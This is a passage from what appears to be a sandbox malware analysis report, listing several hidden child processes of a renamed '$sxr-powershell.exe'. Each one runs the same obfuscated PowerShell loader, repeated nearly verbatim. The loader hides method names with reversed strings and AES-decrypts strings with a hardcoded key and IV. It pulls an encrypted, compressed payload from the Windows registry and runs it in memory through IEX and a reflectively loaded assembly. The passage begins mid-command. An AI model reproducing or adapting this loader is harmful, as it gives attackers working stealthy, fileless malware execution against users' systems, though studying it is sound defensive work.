'')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        30⤵
        
        PID:3384
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6092).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        30⤵
        
        PID:3976
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6092).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        30⤵
        
        PID:4120
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6092).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        30⤵
        
        PID:9492
        
        C:\Windows\$sxr-powershell.exe
        
